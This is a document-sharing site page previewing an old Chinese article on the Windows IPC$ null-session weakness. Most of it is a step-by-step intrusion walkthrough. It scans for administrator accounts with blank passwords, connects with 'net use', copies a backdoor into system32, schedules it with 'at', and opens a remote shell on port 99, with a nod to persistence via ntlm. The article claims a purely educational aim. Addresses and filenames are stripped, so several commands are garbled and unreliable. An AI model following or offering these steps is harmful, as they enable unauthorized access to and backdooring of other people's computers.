1 / 3
文档名称:

ipc漏洞简介.doc

格式:doc   页数:3页
下载后只包含 1 个 DOC 格式的文档,没有任何的图纸或源代码,查看文件列表

如果您已付费下载过本站文档,您可以点这里二次下载

分享

预览

ipc漏洞简介.doc

上传人:yixingmaoj 2014/11/22 文件大小:0 KB

下载得到文件列表

ipc漏洞简介.doc

文档介绍

文档介绍:什么是IPC$漏洞 2009-09-05 14:39出处:中国IT实验室作者:佚名【我要评论】[导读] 常常在网上听人说IPC漏洞,那么IPC漏洞到底是什么呢?网络流氓们是怎么利用这个漏洞的呢?抱着这样的问题,我们一起来看看笔者带来的精彩文章!
常常在网上听人说IPC漏洞,那么IPC漏洞到底是什么呢?网络流氓们是怎么利用这个漏洞的呢?抱着这样的问题,我们一起来看看笔者带来的精彩文章!
什么是IPC漏洞
IPC是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们还可以得到目标主机上的用户列表。但是,一些别有用心者会利用IPC,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。
如何利用IPC漏洞
攻击者在这里一般会用到《流光》这个软件,兔子在这里特别提醒你,《流光》是一款功能非常强大的软件,在我们使用时一定要注意,不得进行非法破坏!
第一步:运行《流光》(),按“CTRL+R”键弹出扫描框,我们这里只是做个测试,目的是告诉大家这个漏洞的危害,所以我们现在随便选择一段IP进行扫描。(如图),其它的均使用默认,不需要改变设置。
第二步:大家打开Win2000自带的命令提示行,注:这里我们不是教大家怎么破坏,只是给大家介绍这个漏洞的危害,所以下面的IP是假设的,并不存在。
1. C:\>net use \\\IPC "" /user:"admintitrators"
这就是刚才用《流光》扫到的用户名是administrators,密码为“空”的IP地址,如果是攻击者的话,,因为密码为“空”,所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy \\\admin
,在流光的Tools目录下就有(这里的是指admin用户的c:\winnt\system32\,大家还可以使用c、d,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\
查查时间,:00,命令成功完成。
4. C:\>at \\ 11:05
(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\
再查查到时间没有?:05,那就准备开始下面的命令。
6. C:\> 99
命令吧,注意端口是99。默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
上去了,但是SRV是一次性的,下次登录还要再激活!服务!这就要用到ntlm了。
:\>copy \\1